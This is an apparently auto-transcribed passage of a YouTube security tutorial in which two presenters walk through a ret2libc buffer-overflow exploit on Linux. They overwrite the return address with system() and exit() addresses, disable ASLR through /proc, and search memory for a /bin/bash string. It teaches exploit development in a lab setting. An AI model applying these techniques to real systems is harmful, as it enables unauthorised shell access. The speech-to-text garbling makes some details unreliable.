we are returning to the system function that is  not how you call a function and you don't return   to it you call it remember the first thing that  call instruction does it pushes the return pointer   onto the stack so this padd that I'm putting there  is literally where system will return to when it   gets done executing my my command so that's it's  expecting the return board to be at that position   in memory so we're just putting padd it'll crash  but hopefully it'll pop my show first so let's see   if we can make that work I'm going to put in this  address now which is the address of the bin bash   so x3d\xb3\xff\xff and then let's cross our fingers at  a seg fault it I don't know if I got a shell or not   oh yeah we did look see that detaching after v4  control process so it did pop a shell just didn't   follow the fork so that's pretty cool it did  actually pop the shell but here the thing is it   still crashed though didn't it let's fix that so  it doesn't crash and it crashes gracefully print   the address of the exit function so instead of  the padd I'm going to put the address of the exit   function in there so when it returns it exits  cleanly and it doesn't put a log in you know that   we would see with d message so now I'm going to  put this address in and we'll say x90\x36\xe1\xf7   now when I run it I'm hoping it doesn't  crash it's still says no it did crash   anyway I wonder why it did that trap adjust  sign trap interrupt direction soon virtual   still did the fork but for whatever reason I think  it's because we're in a debugger but normally that   would let us exit out cleanly. So you would have  popped a shell and then you would have basically   got access right? Yeah yeah that totally that's  it's just not far enough for it I'll try it   outside the debugger real quickly but ASLR is on  so I don't know if it's gonna work but it's okay   we'll give it a shot let's copy this why isn't  it let me copy that maybe it did all right let's   so what I just looked at there is randomized VA  space that's the setting for ASLR I'm going to   try and turn that off right now since we're  not going through a just you know defeating   ASLR session right now that's jumping ahead  I think for everyone who's watching let us   know in the comments the kind of stuff that you  want to see Stephen's got so much knowledge and   I mean this is just the beginning so let us  know the kind of stuff that you want to see echo 0/proc/sys/kernel that's  the crazy thing is you can turn off ASLR so easily   on a Linux box on Windows you can't do that all  right so now let's try to run the exploit again   I don't think it's going to be happy all right so  here's something interesting we try to run this   outside of the debugger and notice it's saying  not found saying that this crazy thing here is not   found what's happening is it's actually working so  system is actually trying to execute our command   and that's why a shell is printing out this crazy  stuff but the memory layout outside the debugger   is different than inside the debugger so I'm going  to try one last thing to see if I can get this to   work export I'm gonna create an environment  variable now look let's see if we can find it   but let's see export and then we're going to call  it SYS equals that's the name of my environment   variable and I want it to simply say bin bash  and if I can find that environment variable in   memory then it will execute that let me see if I  can find it here, so that's the problem now is I   need to find that environment variable which can  be really really tricky I'm going to look around   a little bit so see how um ln missing file up  around we're getting weird things getting sent to   us that's because we're sneaking around in memory  I'm typing different addresses trying to find the   string bin bash so sometimes we get a weird message  because we are passing a string it's a system that   it doesn't understand it's like what is that. So if  everyone watching Stephen and I have spent quite a   bit of time now trying to manually find the part of  memory so Stephen you can explain it better than   I but you're missing a piece of software that  would allow you to find it and then when we try   to run bash it wasn't allowing us to do it right?  yeah for sure unfortunately there's this little   program I wrote it doesn't do anything fancy  but it basically if you create an environment   variable it will tell you the address as to where  that environment variable will be located so the   first thing we saw was when the process crashes we  saw this shell equals bin bash that was for some   reason there mapped into the environment so when  I read it the debugger as you saw we got a shell   and it worked it just didn't follow the fork  but we got a shell perfect awesome wanted to   get it working outside the debugger real quick so  I was like maybe I can find this / bin   /bash outside the debugger so we started looking  at these environment variables all around here   and by messing around with the memory address  we were able to find out exactly where we were   we printed out true color we printed out session  manager and we should have been right here and we   were able to get to some stuff behind that address  but for whatever reason it wasn't actually mapping   that specific shell environment variable into  memory at that spot even though we found the   right address and we don't know if that's maybe  a protection or for some other reason it's not   there to get around this you typically can simply  create an environment variable yourself and then   find the address of that variable and pass  it as an argument and this was just one of   the techniques that we were looking at called  Ret2libc which you overwrite the return   pointer with the address of of the function  that's loaded into memory and you can pass   any argument you want to that function and you  get around data execution prevention because   the code you're executing is really in the code  segment we're searching through memory here we   just couldn't help ourselves but to look around a  bit more we were able to find the equals bin bash   environment variable and for whatever reason  when we go forward one more byte to 35  which should actually be /ben bash it's not  popping a shell we go forward a couple more bytes   like 37 you can see in bash but for  whatever reason it's not popping one and it   probably has to do with like the permissions not  being set properly or so other protection might be   running on this box and I'm not compensating for  but we actually had it working perfectly right   here and the debugger it worked outside of the  bugger it's not so that leads me to believe that   there is another like depth component preventing  this from being possible but a lot of times this   works perfectly. So Stephen the question is always  how do I learn more you have a bunch of the stuff   on your channel right and a whole bunch of of  other things. Yeah absolutely so on my channel   I tend to weave in and out of exploit development  topics and then we'll go to Cloud hacking and then   we'll go to crypto and just kind of all over  the place because I think it's really fun to   have guests on to talk about different areas  where they're an expert when I typically tend   to do it like recently I went through and did some  kernel debugging and reverse engineered different   exploit mitigations so that we could understand  how these mitigations work at a very low level   so I tend to be in the more advanced spaces but  if there's a topic you'd love to see I'm happy   to do it on that channel or also here with David  of course but yeah my off by One Security Channel   on YouTube I try as many Fridays as possible  at 11 A.M Pacific time. So if everyone watching   please go and show your love go and subscribe  to Stephen's Channel Stephen thanks so much for   sharing your knowledge I know you've been in this  game a long time and you have a crazy amount of   knowledge so thanks for you know making it freely  available on YouTube really appreciate it [Music]
Info
Channel: David Bombal
Views: 56,668
Rating: undefined out of 5
Keywords: buffer, buffer overflow, buffer overflow attack, hacking, cracking, attacks, exploit, buffer exploit, buffer underflow, buffer overrun, computer security, Data Buffer, Exploit, exploit development, windows, linux, exploits, zero day, ubuntu, kali, kali linux, windows 11, windows 10, cyber, cybersecurity, hack, hacker, malware, infosec, information security, cyber security, ethical hacking, real world hack, hacking course, cybersecurity course, oscp, buffer overflow exploit, 0day
Id: c2BvS2VqDWg
Channel Id: undefined
Length: 55min 39sec (3339 seconds)
Published: Sun Aug 13 2023
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.